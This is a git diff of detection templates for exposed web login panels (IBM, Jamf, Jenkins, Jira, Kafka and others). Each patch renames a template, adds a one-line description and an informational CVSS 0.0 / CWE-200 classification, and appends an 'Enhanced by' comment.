exposed-panels/ixcache-panel.yaml | 9 ++++++++- exposed-panels/jamf-login.yaml | 9 ++++++++- exposed-panels/jamf-panel.yaml | 9 ++++++++- exposed-panels/jamf-setup-assistant.yaml | 9 ++++++++- exposed-panels/jaspersoft-panel.yaml | 9 ++++++++- exposed-panels/jeedom-panel.yaml | 9 ++++++++- exposed-panels/jenkins-api-panel.yaml | 12 +++++++++--- exposed-panels/jfrog-login.yaml | 9 ++++++++- exposed-panels/jira-detect.yaml | 9 ++++++++- exposed-panels/jmx-console.yaml | 9 ++++++++- exposed-panels/joget/joget-panel.yaml | 11 +++++++++-- exposed-panels/jumpserver-panel.yaml | 10 ++++++++-- exposed-panels/jupyter-notebook.yaml | 10 ++++++++-- exposed-panels/kafka-center-login.yaml | 9 ++++++++- exposed-panels/kafka-connect-ui.yaml | 9 ++++++++- exposed-panels/kafka-consumer-monitor.yaml | 11 +++++++++-- exposed-panels/kafka-monitoring.yaml | 9 ++++++++- exposed-panels/kafka-topics-ui.yaml | 9 ++++++++- exposed-panels/kavita-panel-detect.yaml | 10 ++++++++-- exposed-panels/keenetic-web-login.yaml | 9 ++++++++- exposed-panels/kentico-login.yaml | 11 +++++++++-- exposed-panels/kerio-connect-client.yaml | 9 ++++++++- exposed-panels/kettle-panel.yaml | 9 ++++++++- exposed-panels/key-cloak-admin-panel.yaml | 9 ++++++++- exposed-panels/kfm/kaes-file-manager.yaml | 9 ++++++++- exposed-panels/kfm/kfm-login-panel.yaml | 9 ++++++++- exposed-panels/kibana-panel.yaml | 9 ++++++++- exposed-panels/kiwitcms-login.yaml | 11 +++++++++-- exposed-panels/kkfileview-panel.yaml | 9 ++++++++- exposed-panels/kronos-workforce-central.yaml | 9 ++++++++- exposed-panels/kubernetes-dashboard.yaml | 9 ++++++++- exposed-panels/labkey-server-login.yaml | 9 ++++++++- exposed-panels/labtech-panel.yaml | 9 ++++++++- 54 files changed, 439 insertions(+), 67 deletions(-) diff --git a/exposed-panels/ibm/ibm-security-access-manager.yaml b/exposed-panels/ibm/ibm-security-access-manager.yaml index 5ebf88e556..067a8e56d1 100644 --- a/exposed-panels/ibm/ibm-security-access-manager.yaml +++ b/exposed-panels/ibm/ibm-security-access-manager.yaml @@ -1,12 +1,16 @@ id: ibm-security-access-manager info: - name: Detects IBM Security Access Manager + name: IBM Security Access Manager Login Panel - Detect author: geeknik severity: info - description: IBM Security Access Manager is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets. + description: IBM Security Access Manager login panel was detected. reference: - https://www.ibm.com/docs/en/sva/9.0.7?topic=overview-introduction-security-access-manager + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,ibm requests: @@ -32,3 +36,5 @@ requests: - "/mga/sps/authsvc/policy/forgot_password" part: body condition: and + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/ibm/ibm-service-assistant.yaml b/exposed-panels/ibm/ibm-service-assistant.yaml index 08e5b2ba96..e07a10bbe5 100644 --- a/exposed-panels/ibm/ibm-service-assistant.yaml +++ b/exposed-panels/ibm/ibm-service-assistant.yaml @@ -1,9 +1,14 @@ id: ibm-service-assistant info: - name: IBM Service Assistant + name: IBM Service Assistant Login Panel - Detect author: dhiyaneshDK severity: info + description: IBM Service Assistant login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Welcome to Service Assistant" tags: panel,ibm,service @@ -22,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/ibm/ibm-websphere-admin-panel.yaml b/exposed-panels/ibm/ibm-websphere-admin-panel.yaml index 5649182ff6..958864866a 100644 --- a/exposed-panels/ibm/ibm-websphere-admin-panel.yaml +++ b/exposed-panels/ibm/ibm-websphere-admin-panel.yaml @@ -1,11 +1,16 @@ id: ibm-websphere-admin-panel info: - name: WebSphere Application Server Community Edition Admin Panel + name: IBM WebSphere Application Server Community Edition Admin Login Panel - Detect author: ritikchaddha severity: info + description: IBM WebSphere Application Server Community Edition admin login panel was detected. reference: - https://www.ibm.com/support/pages/what-default-username-and-password-websphere-application-server-community-edition-and-how-add-users-admin-group + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.favicon.hash:1337147129 @@ -30,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/ibm/ibm-websphere-panel.yaml b/exposed-panels/ibm/ibm-websphere-panel.yaml index ca423f4024..88074dde0a 100644 --- a/exposed-panels/ibm/ibm-websphere-panel.yaml +++ b/exposed-panels/ibm/ibm-websphere-panel.yaml @@ -1,9 +1,14 @@ id: ibm-websphere-panel info: - name: IBM WebSphere Panel + name: IBM WebSphere Portal Login Panel - Detect author: pdteam severity: info + description: IBM WebSphere Portal login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.html:"IBM WebSphere Portal" tags: ibm,websphere,panel @@ -26,4 +31,6 @@ requests: words: - 'IBM WebSphere Portal' - 'IBMPortalWeb' - condition: or \ No newline at end of file + condition: or + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/icc-pro-login.yaml b/exposed-panels/icc-pro-login.yaml index a80fbe5ce8..9fe15ddd1f 100644 --- a/exposed-panels/icc-pro-login.yaml +++ b/exposed-panels/icc-pro-login.yaml @@ -1,11 +1,16 @@ id: icc-pro-login info: - name: ICC Pro System Login + name: ICC PRO Login Panel - Detect author: DhiyaneshDk severity: info + description: ICC PRO login panel was detected. reference: - https://www.exploit-db.com/ghdb/7980 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Login to ICC PRO system" @@ -31,3 +36,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/icewarp-panel-detect.yaml b/exposed-panels/icewarp-panel-detect.yaml index 7de9011d0e..29f1b6fb65 100644 --- a/exposed-panels/icewarp-panel-detect.yaml +++ b/exposed-panels/icewarp-panel-detect.yaml @@ -1,9 +1,14 @@ id: icewarp-panel-detect info: - name: IceWarp Panel Detect + name: IceWarp Login Panel - Detect author: ritikchaddha severity: info + description: IceWarp login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"icewarp" @@ -32,3 +37,5 @@ requests: group: 1 regex: - 'Server: (.{4,20})' + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/icinga-web-login.yaml b/exposed-panels/icinga-web-login.yaml index 5602ac406b..8fe280b86f 100644 --- a/exposed-panels/icinga-web-login.yaml +++ b/exposed-panels/icinga-web-login.yaml @@ -1,9 +1,14 @@ id: icinga-web-login info: - name: Icinga Web 2 Login + name: Icinga Web 2 Login Panel - Detect author: dhiyaneshDK severity: info + description: Icinga Web 2 login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Icinga Web 2 Login" tags: panel,icinga @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/identity-services-engine.yaml b/exposed-panels/identity-services-engine.yaml index d3e217f6e5..60504a0c1a 100644 --- a/exposed-panels/identity-services-engine.yaml +++ b/exposed-panels/identity-services-engine.yaml @@ -1,9 +1,14 @@ id: identity-services-engine info: - name: Identity Services Engine + name: Cisco Identity Services Engine Admin Login Panel - Detect author: dhiyaneshDK severity: info + description: Cisco Identity Services Engine admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Identity Services Engine" tags: panel @@ -19,3 +24,5 @@ requests: - type: word words: - 'Identity Services Engine' + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/ilch-admin-panel.yaml b/exposed-panels/ilch-admin-panel.yaml index 264b68a22d..87a4d2b782 100644 --- a/exposed-panels/ilch-admin-panel.yaml +++ b/exposed-panels/ilch-admin-panel.yaml @@ -1,9 +1,14 @@ id: ilch-admin-panel info: - name: Ilch CMS Admin Panel + name: Ilch CMS Admin Login Panel - Detect author: ritikchaddha severity: info + description: Ilch CMS admin login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Ilch" @@ -24,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/incapptic-connect-panel.yaml b/exposed-panels/incapptic-connect-panel.yaml index b5ce25f91c..930c53e298 100644 --- a/exposed-panels/incapptic-connect-panel.yaml +++ b/exposed-panels/incapptic-connect-panel.yaml @@ -1,11 +1,16 @@ id: incapptic-connect-panel info: - name: IVANTI Incapptic Connect + name: Ivanti Incapptic Connect Panel - Detect author: righettod severity: info + description: Ivanti Incapptic Connect panel was detected. reference: - https://www.ivanti.com/products/incapptic-connect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: - http.title:"incapptic" @@ -34,3 +39,5 @@ requests: - "status_code==200" - "('-1067582922' == mmh3(base64_py(body)))" condition: and + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/intelbras-login.yaml b/exposed-panels/intelbras-login.yaml index 1f2a3a5bd4..f9d731a73d 100644 --- a/exposed-panels/intelbras-login.yaml +++ b/exposed-panels/intelbras-login.yaml @@ -1,11 +1,16 @@ id: intelbras-login info: - name: Intelbras Login + name: Intelbras Router Login Panel - Detect author: DhiyaneshDK severity: info + description: Intelbras router logjn panel was detected. reference: - https://www.exploit-db.com/ghdb/7272 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Intelbras" google-query: intitle:"Intelbras" "All Rights Reserved" -.com @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/intelbras-panel.yaml b/exposed-panels/intelbras-panel.yaml index 0fec2aacba..87c3b0885d 100644 --- a/exposed-panels/intelbras-panel.yaml +++ b/exposed-panels/intelbras-panel.yaml @@ -1,9 +1,14 @@ id: intelbras-panel info: - name: Intelbras Panel + name: Intelbras Router Panel - Detect author: pikpikcu severity: info + description: Intelbras router panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:"Intelbras" @@ -29,3 +34,5 @@ requests: group: 1 regex: - 'id="product">([A-Za-z 0-9]+)<\/p>' + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/intellian-aptus-panel.yaml b/exposed-panels/intellian-aptus-panel.yaml index 8bb63d993f..a37f43f2c2 100644 --- a/exposed-panels/intellian-aptus-panel.yaml +++ b/exposed-panels/intellian-aptus-panel.yaml @@ -1,9 +1,14 @@ id: intellian-aptus-panel info: - name: Intellian Aptus Web Login Panel + name: Intellian Aptus Web Login Panel - Detect author: princechaddha severity: info + description: Intelllian Aptus Web login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Intellian Aptus Web" tags: panel,intellian,aptus @@ -31,3 +36,5 @@ requests: group: 1 regex: - "Intellian Aptus Web (.*)" + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/intelliflash-login-panel.yaml b/exposed-panels/intelliflash-login-panel.yaml index e9c90849ce..717f140a92 100644 --- a/exposed-panels/intelliflash-login-panel.yaml +++ b/exposed-panels/intelliflash-login-panel.yaml @@ -1,9 +1,14 @@ id: intelliflash-login-panel info: - name: IntelliFlash Login Panel Detect + name: IntelliFlash Login Panel - Detect author: princechaddha severity: info + description: IntelliFlash login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,intelliflash requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/iomega-emc-shared-nas.yaml b/exposed-panels/iomega-emc-shared-nas.yaml index f9d328f3d4..c10e594972 100644 --- a/exposed-panels/iomega-emc-shared-nas.yaml +++ b/exposed-panels/iomega-emc-shared-nas.yaml @@ -1,9 +1,14 @@ id: iomega-emc-shared-nas info: - name: Iomega Lenovo EMC with shared NAS + name: Iomega LenovoEMC NAS Login Panel - Detect author: e_schultze_ severity: info + description: Iomega LenovoEMC NAS login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel requests: @@ -28,3 +33,5 @@ requests: words: - "iomega" part: header + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/ipdiva-mediation-panel.yaml b/exposed-panels/ipdiva-mediation-panel.yaml index 1c0769eb42..e8f85782f9 100644 --- a/exposed-panels/ipdiva-mediation-panel.yaml +++ b/exposed-panels/ipdiva-mediation-panel.yaml @@ -1,9 +1,14 @@ id: ipdiva-mediation-panel info: - name: IPdiva Mediation Panel Detect + name: IPdiva Mediation Login Panel - Detect author: ritikchaddha severity: info + description: IPdiva Mediation login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"IPdiva" @@ -30,3 +35,5 @@ requests: part: body words: - "IPdiva Secure" + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/iptime-router.yaml b/exposed-panels/iptime-router.yaml index 544cee35b2..3ff7c3fee6 100644 --- a/exposed-panels/iptime-router.yaml +++ b/exposed-panels/iptime-router.yaml @@ -1,11 +1,16 @@ id: iptime-router info: - name: ipTIME Router Login + name: ipTIME Router Login Panel - Detect author: gy741 severity: info + description: ipTIME router login panel was detected. reference: - http://pierrekim.github.io/blog/2015-07-01-poc-with-RCE-against-127-iptime-router-models.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,login,iptime,router requests: @@ -29,3 +34,5 @@ requests: group: 1 regex: - ipTIME ([A-Z0-9_-]+)<\/TITLE> + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/issabel-login.yaml b/exposed-panels/issabel-login.yaml index 2c74149e0e..b08b32fd44 100644 --- a/exposed-panels/issabel-login.yaml +++ b/exposed-panels/issabel-login.yaml @@ -1,9 +1,14 @@ id: issabel-login info: - name: Issabel Login Panel + name: Issabel Login Panel - Detect author: pikpikcu severity: info + description: Issabel login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: fofa-query: title="Issabel" tags: issabel,panel @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/istat-panel-detect.yaml b/exposed-panels/istat-panel-detect.yaml index 596da4463f..030f17b846 100644 --- a/exposed-panels/istat-panel-detect.yaml +++ b/exposed-panels/istat-panel-detect.yaml @@ -1,9 +1,14 @@ id: istat-panel-detect info: - name: i-STAT Panel Detect + name: Abbott i-STAT Login Panel - Detect author: princechaddha severity: info + description: Abbott i-STAT login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,abbott,istat requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/itop-panel.yaml b/exposed-panels/itop-panel.yaml index 367b274f54..73fd4426c4 100644 --- a/exposed-panels/itop-panel.yaml +++ b/exposed-panels/itop-panel.yaml @@ -1,10 +1,14 @@ id: itop-panel info: - name: iTop Instance Detection Template + name: Combodo iTop Login Panel - Detect author: righettod severity: info - description: Try to detect the presence of a Combodo iTop instance via the login page + description: Combodo iTop login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,itop requests: @@ -24,4 +28,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/ixbus/ixbusweb-version.yaml b/exposed-panels/ixbus/ixbusweb-version.yaml index 46d6185c1f..a77feeff2f 100644 --- a/exposed-panels/ixbus/ixbusweb-version.yaml +++ b/exposed-panels/ixbus/ixbusweb-version.yaml @@ -1,9 +1,14 @@ id: ixbusweb-panel info: - name: iXBusWeb Panel Detect + name: iXBus Login Panel - Detect author: Podalirius severity: info + description: iXBus login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"iXBus" tags: panel,ixbusweb,cms @@ -29,3 +34,5 @@ requests: group: 2 regex: - '(iXBusWeb[\n\t ]+\((([0-9]+(.[0-9]+)?(.[0-9]+)?(.[0-9]+)?))\))' + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/ixcache-panel.yaml b/exposed-panels/ixcache-panel.yaml index acc8fa4097..0cb39c6e5c 100644 --- a/exposed-panels/ixcache-panel.yaml +++ b/exposed-panels/ixcache-panel.yaml @@ -1,11 +1,16 @@ id: ixcache-panel info: - name: iXCache Panel Detect + name: iXCache Login Panel - Detect author: ffffffff0x severity: info + description: iXCache login panel was detected. reference: - https://www.panabit.com/cn/product/iXCache/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: fofa-query: app="iXCache" tags: ixcache,panel @@ -27,3 +32,5 @@ requests: - type: status status: - 302 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/jamf-login.yaml b/exposed-panels/jamf-login.yaml index 881d47a345..e9958a7186 100644 --- a/exposed-panels/jamf-login.yaml +++ b/exposed-panels/jamf-login.yaml @@ -1,9 +1,14 @@ id: jamf-login info: - name: Jamf Pro Login + name: Jamf Pro Login Panel - Detect author: DhiyaneshDk severity: info + description: Jamf Pro login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: title:"Jamf Pro" @@ -25,3 +30,5 @@ requests: - type: status status: - 401 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/jamf-panel.yaml b/exposed-panels/jamf-panel.yaml index febbf8b7e0..e440487238 100644 --- a/exposed-panels/jamf-panel.yaml +++ b/exposed-panels/jamf-panel.yaml @@ -1,9 +1,14 @@ id: jamf-panel info: - name: JAMF MDM Panel + name: Jamf MDM Login Panel - Detect author: pdteam,idealphase severity: info + description: Jamf Mobile Device Management login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.favicon.hash:1262005940 tags: jamf,panel,mdm @@ -30,3 +35,5 @@ requests: group: 1 regex: - '<meta name=\"version\" content=\"(.*)\">' + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/jamf-setup-assistant.yaml b/exposed-panels/jamf-setup-assistant.yaml index ca663bdae7..573e96f0db 100644 --- a/exposed-panels/jamf-setup-assistant.yaml +++ b/exposed-panels/jamf-setup-assistant.yaml @@ -1,9 +1,14 @@ id: jamf-setup-assistant info: - name: Jamf Pro Setup Assistant + name: Jamf Pro Setup Assistant Panel - Detect author: ritikchaddha severity: info + description: Jamf Pro Setup Assistant panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"Jamf Pro Setup" @@ -23,3 +28,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/jaspersoft-panel.yaml b/exposed-panels/jaspersoft-panel.yaml index e1afb10df0..41e87a75fa 100644 --- a/exposed-panels/jaspersoft-panel.yaml +++ b/exposed-panels/jaspersoft-panel.yaml @@ -1,9 +1,14 @@ id: jaspersoft-panel info: - name: Jaspersoft Panel Login + name: TIBCO Jaspersoft Login Panel - Detect author: koti2,daffainfo severity: info + description: TIBCO Jaspersoft login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Jaspersoft" tags: panel,jaspersoft @@ -27,3 +32,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/jeedom-panel.yaml b/exposed-panels/jeedom-panel.yaml index ee6cc9431c..e9e687d3d3 100644 --- a/exposed-panels/jeedom-panel.yaml +++ b/exposed-panels/jeedom-panel.yaml @@ -1,9 +1,14 @@ id: jeedom-panel info: - name: Jeedom Login Panel + name: Jeedom Login Panel - Detect author: pikpikcu,daffainfo severity: info + description: Jeedom login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Jeedom" tags: panel,jeedom,login @@ -25,3 +30,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/jenkins-api-panel.yaml b/exposed-panels/jenkins-api-panel.yaml index e99421b55c..60f9dec2fb 100644 --- a/exposed-panels/jenkins-api-panel.yaml +++ b/exposed-panels/jenkins-api-panel.yaml @@ -1,10 +1,14 @@ id: jenkins-api-panel info: - name: Jenkins API Instance Detection Template + name: Jenkins API Panel - Detect author: righettod severity: info - description: Try to detect the presence of a Jenkins API instance via the API default XML endpoint + description: Jenkins API panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,api,jenkins requests: @@ -20,4 +24,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/jfrog-login.yaml b/exposed-panels/jfrog-login.yaml index f0944bde78..14bb3918d6 100644 --- a/exposed-panels/jfrog-login.yaml +++ b/exposed-panels/jfrog-login.yaml @@ -1,11 +1,16 @@ id: jfrog-login info: - name: JFrog Login + name: JFrog Login Panel - Detect author: dhiyaneshDK severity: info + description: JFrog login panel was detected. reference: - https://www.exploit-db.com/ghdb/6797 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,jfrog,edb requests: @@ -21,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/jira-detect.yaml b/exposed-panels/jira-detect.yaml index 1abafa7eeb..9d8f01ea1a 100644 --- a/exposed-panels/jira-detect.yaml +++ b/exposed-panels/jira-detect.yaml @@ -1,9 +1,14 @@ id: jira-detect info: - name: Detect Jira Issue Management Software + name: Jira Login Panel - Detect author: pdteam,philippedelteil severity: info + description: Jira login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,jira requests: @@ -27,3 +32,5 @@ requests: group: 1 regex: - 'title="JiraVersion" value="([0-9.]+)' + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/jmx-console.yaml b/exposed-panels/jmx-console.yaml index 13227b6818..8ddd6369ec 100644 --- a/exposed-panels/jmx-console.yaml +++ b/exposed-panels/jmx-console.yaml @@ -1,9 +1,14 @@ id: jmx-console info: - name: JMX Console + name: JBoss JMX Management Console Login Panel - Detect author: yashanand155 severity: low + description: JBoss JMX Management Console login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,jmx requests: @@ -14,3 +19,5 @@ requests: - type: word words: - JBoss JMX Management Console + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/joget/joget-panel.yaml b/exposed-panels/joget/joget-panel.yaml index 641907b36d..1fc122fc7c 100644 --- a/exposed-panels/joget/joget-panel.yaml +++ b/exposed-panels/joget/joget-panel.yaml @@ -1,9 +1,14 @@ id: joget-panel info: - name: JoGet Login Panel + name: Joget Panel - Detect author: Podalirius severity: info + description: Joget panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.favicon.hash:-1343712810 tags: panel,joget @@ -28,4 +33,6 @@ requests: part: body group: 2 regex: - - '<li>(Version:[ \n\t]*([^<]+)[ \n\t]*)</li>' \ No newline at end of file + - '<li>(Version:[ \n\t]*([^<]+)[ \n\t]*)</li>' + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/jumpserver-panel.yaml b/exposed-panels/jumpserver-panel.yaml index 686c820517..4714a35533 100644 --- a/exposed-panels/jumpserver-panel.yaml +++ b/exposed-panels/jumpserver-panel.yaml @@ -1,13 +1,17 @@ id: jumpserver-panel info: - name: JumpServer Admin Panel + name: JumpServer Login Panel - Detect author: lu4nx severity: info description: | - The JumpServer Open Source Bastion Host was found. + JumpServer Open Source Bastion Host login panel was detected. reference: - https://www.jumpserver.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: verified: true shodan-query: http.title:'JumpServer' @@ -31,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/jupyter-notebook.yaml b/exposed-panels/jupyter-notebook.yaml index 612508d46b..fbe1ae2165 100644 --- a/exposed-panels/jupyter-notebook.yaml +++ b/exposed-panels/jupyter-notebook.yaml @@ -1,13 +1,17 @@ id: jupyter-notebook info: - name: Jupyter Notebook + name: Jupyter Notebook Login Panel - Detect author: hakimkt,arafatansari severity: info description: | - JupyterHub is an open source tool that lets you host a distributed Jupyter Notebook environment. + Jupyter Notebook login panel was detected. reference: - https://www.exploit-db.com/ghdb/7970 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.html:"JupyterHub" tags: edb,panel,jupyter,notebook,exposure @@ -37,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by md on 2022/11/21 diff --git a/exposed-panels/kafka-center-login.yaml b/exposed-panels/kafka-center-login.yaml index 102a3c943d..b1e0866956 100644 --- a/exposed-panels/kafka-center-login.yaml +++ b/exposed-panels/kafka-center-login.yaml @@ -1,9 +1,14 @@ id: kafka-center-login info: - name: Kafka Center Login + name: Apache Kafka Control Center Login Panel - Detect author: dhiyaneshDK severity: info + description: Apache Kafka Control Center login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 metadata: shodan-query: http.title:"Kafka Center" tags: panel,kafka @@ -19,3 +24,5 @@ requests: - type: word words: - '<title>Kafka Center' + +# Enhanced by md on 2022/11/22 diff --git a/exposed-panels/kafka-connect-ui.yaml b/exposed-panels/kafka-connect-ui.yaml index 286da7dd57..bd4bc07e50 100644 --- a/exposed-panels/kafka-connect-ui.yaml +++ b/exposed-panels/kafka-connect-ui.yaml @@ -1,9 +1,14 @@ id: kafka-connect-ui info: - name: Apache Kafka Connect UI Exposure + name: Apache Kafka Connect UI Login Panel - Detect author: pdteam severity: low + description: Apache Kafka Connect UI login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 tags: panel,kafka,apache requests: @@ -15,3 +20,5 @@ 